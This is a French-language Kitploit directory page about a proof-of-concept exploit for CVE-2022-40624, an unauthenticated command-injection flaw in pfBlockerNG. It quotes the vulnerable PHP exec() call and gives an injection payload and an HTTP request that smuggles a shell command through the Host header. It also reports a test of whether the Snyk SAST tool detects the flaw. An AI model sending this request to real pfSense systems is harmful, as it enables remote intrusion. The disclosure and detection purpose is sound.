Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
pfBlockerNg-CVE-2022-40624 — Exploit de preuve de concept pour une exécution de code à distance non authentifiée dans pfBlockerNg via une entrée non échappée dans la fonction de requête DNSBL TLD, avec analyse de détection SAST. | Kitploit
Outils/GitHubGitHub/dhammon/pfblockerng-cve-2022-40624
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubdhammon/pfblockerng-cve-2022-40624

pfBlockerNg-CVE-2022-40624

Exploit de preuve de concept pour une exécution de code à distance non authentifiée dans pfBlockerNg via une entrée non échappée dans la fonction de requête DNSBL TLD, avec analyse de détection SAST.

Voir le dépôt
22il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

pfBlockerNg-CVE-2022-40624

Contexte

pfBlockerNG est la nouvelle génération de pfBlocker avec les fonctionnalités suivantes :

  1. Gérer les sources de listes IPv4/v6 dans les formats 'Deny, Permit ou Match'.
  2. Base de données GeoIP par MaxMind Inc. (version gratuite GeoLite2).
  3. Améliorations de déduplication, suppression et réputation.
  4. Disposition pour télécharger à partir de divers formats de listes.
  5. Intégration avancée pour les sources de menaces de réputation IP Proofpoint ET IQRisk.
  6. Blocage de noms de domaine (DNSBL) via le résolveur DNS Unbound.

https://docs.netgate.com/pfsense/en/latest/packages/pfblocker.html

Versions affectées

pfBlockerNg <2.1.4_27

Vulnérabilité

Exécution de code à distance non authentifiée (RCE)

La requête pour la section TLD Block de index.php inclut une entrée utilisateur non nettoyée/non échappée d_query provenant de l'en-tête Host dans le puits de la fonction PHP exec.

exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

/pfblockerng/www/index.php

root@kitploit:~
// Query for a TLD Block
if (empty($pfb_query)) {
	$idparts	= explode('.', $query);
	$idcnt		= (count($idparts) -1);

	for ($i=1; $i <= $idcnt; $i++) {
		$d_query = implode('.', array_slice($idparts, -$i, $i, TRUE));
		exec("/usr/bin/grep -l '^{$d_query}$' /var/db/pfblockerng/dnsblalias/DNSBL_TLD", $match);

		if (!empty($match[0])) {
			$pfb_query = 'DNSBL_TLD';
			break;
		}
	}
}

Exploitation

Nécessite un accès HTTP à la console web pfSense Exemple de payload : ' *; sleep 5; '

Requête POC :

root@kitploit:~
GET /pfblockerng/www/index.php HTTP/1.1
Host: test.test2' *; sleep 5; '
Content-Length: 2

Inspiration

J'adore pfBlockerNg et j'ai été inspiré par le récent CVE-2022-31814 de Di r00t et son excellent writeup https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/ et j'étais curieux de voir si l'outil de test de sécurité statique (SAST) Snyk détecterait la vulnérabilité. J'ai donc téléchargé le fichier index.php respectif version 2.1.4_26 et exécuté Snyk Code contre lui. Effectivement, Snyk a détecté la vulnérabilité ainsi qu'une autre similaire signalée juste quelques lignes plus tard.

Télécharger l’outil